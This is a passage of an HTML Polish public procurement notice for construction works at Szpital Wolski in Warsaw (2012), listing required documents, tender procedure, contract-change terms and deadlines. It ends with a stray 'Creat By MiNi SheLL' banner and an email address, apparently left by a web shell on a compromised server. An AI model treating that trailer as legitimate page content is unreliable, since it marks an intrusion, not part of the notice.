<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Pełnomocnictwo do podpisania oferty. Pełnomocnictwo należy załączyć do oferty tylko w przypadku, gdy oferta jest podpisania przez osobę nie figurującą w rejestrze lub wpisie do ewidencji działalności gospodarczej. Brak podpisu na ofercie lub podpisanie oferty przez osobę do tego nieupoważnioną spowoduje konieczność odrzucenia oferty. W przypadku składnia oferty przez podmioty występujące wspólnie, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego jeżeli oferta nie jest podpisana przez wszystkich Wykonawców występujących wspólnie. Postępowanie o udzielenie zamówienia publicznego nie jest postępowaniem sądowym, stwierdzić należy, że złożenie dokumentu pełnomocnictwa lub prokury albo jego odpisu, wypisu lub kopii przez pełnomocnika wykonawcy w postępowaniu o udzielenie zamówienia publicznego nie podlega opłacie skarbowej.
Oświadczenie Wykonawcy, że dla materiałów użytych do wykonania robót posiada certyfikat  deklaracja zgodności dopuszczenia do stosowania w budownictwie szpitalnym, a także oświadczenie, iż przekaże Zamawiającemu dokumenty potwierdzające to oświadczenie nie później niż na 7 dni przed odbiorem robót.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Wypełniony formularz oferty - załącznik nr 1 do SIWZ. 
2)	Istotne dla stron postanowienia, które zostaną wprowadzone do treści umowy  - Załącznik nr 7 do SIWZ.
3)	Wypełnione kosztorysy ofertowe zgodnie z dołączonymi do dokumentacji przetargowej przedmiarami robót, oraz podać czynniki kalkulacyjne użyte do kosztorysu, a które będą stosowane również do wykonania kosztorysu na roboty dodatkowe lub zamienne.  
4)	Dowód wpłaty wadium.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje następujące zmiany w umowie w stosunku do treści oferty zgodnie z art. 144 ustawy: 
1.	Zmiana osób, którym wykonawca zamierza powierzyć funkcję kierownika budowy lub kierownika robót wskazanych w wykazie osób, o którym mowa w pkt. 7.1 ), może nastąpić wyłącznie na zasadach i w trybie określonym w ustawie z dnia 7.7.1994 r. Prawo budowlane (t.j. Dz. U. z 2006 r. Nr 156, poz. 1118 z późn. zm.), pod warunkiem że osoby te spełnią wymogi określone dla tych funkcji na etapie składania ofert.
2.	Dopuszcza się możliwość wprowadzania robót zamiennych, w szczególności w przypadku:
a)	konieczności usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej;
b)	konieczności zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych lub technologicznych niż wskazane w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziłoby niewykonaniem lub wadliwym wykonaniem przedmiotu umowy;
c)	zmiany zaleceń lub regulacji dysponenta środków, o których mowa w pkt. 21.2 SIWZ.
3.	Zakres rzeczowy zamówienia określony umową może zostać ograniczony przez Zamawiającego, bez skutków finansowych i prawnych dla Zamawiającego, w przypadku:
1)	zaistnienia trudności finansowych u Zamawiającego;
2)	gdy wykonanie przedmiotu zamówienia w pełnym zakresie nie leży w interesie publicznym, czego nie można było wcześniej przewidzieć;
3)	gdy wykonanie przedmiotu zamówienia zgodnie z rozwiązaniami określonymi w dokumentacji projektowej i w przyjętym w niej zakresie, jest niezasadne z punktu widzenia ekonomicznego i gospodarczego;
4.	Termin realizacji przedmiotu umowy, o którym mowa w pkt. 5, może ulec zmianie w przypadku:
1)	wystąpienia robót dodatkowych, od wykonania których uzależnione jest wykonanie zamówienia podstawowego;
2)	wystąpienia robót uzupełniających,
3)	w przypadku natrafienia podczas wykonywanych prac na nieprzewidziane a istotne z punktu widzenia historycznego zdarzenia a potwierdzone pisemną opinią Mazowieckiego Wojewódzkiego Konserwatora Zabytków,
4)	w przypadku odkrycia niewybuchów,
5)	wystąpienia konieczności ograniczenia zakresu rzeczowego przedmiotu zamówienia, o którym mowa w pkt. 4; 
6)	wystąpienia warunków atmosferycznych lub klęsk żywiołowych uniemożliwiających realizację przedmiotu zamówienia zgodnie z procesem technologicznym;
7)	wstrzymania robót przez uprawnione organy, z przyczyn nie wynikających z winy Wykonawcy;
8)	konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych lub technologicznych niż wskazane w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziłoby niewykonaniem lub wadliwym wykonaniem przedmiotu umowy;
9)	opóźnień lub trudności związanych z finansowaniem inwestycji ze środków, o których mowa w pkt. 21.1 SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wolski.med.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Wolski im. dr Anny Gostyńskiej, Samodzielny Publiczny Zakład Opieki Zdrowotnej, 01 - 211 Warszawa, ul. Kasprzaka 17 - pawilon nr 8 sekcja zamówień publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.06.2012 godzina 08:00, miejsce: Szpital Wolski im. dr Anny Gostyńskiej, Samodzielny Publiczny Zakład Opieki Zdrowotnej, 01 - 211 Warszawa, ul. Kasprzaka 17 - pawilon nr 2  kancelaria główna..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com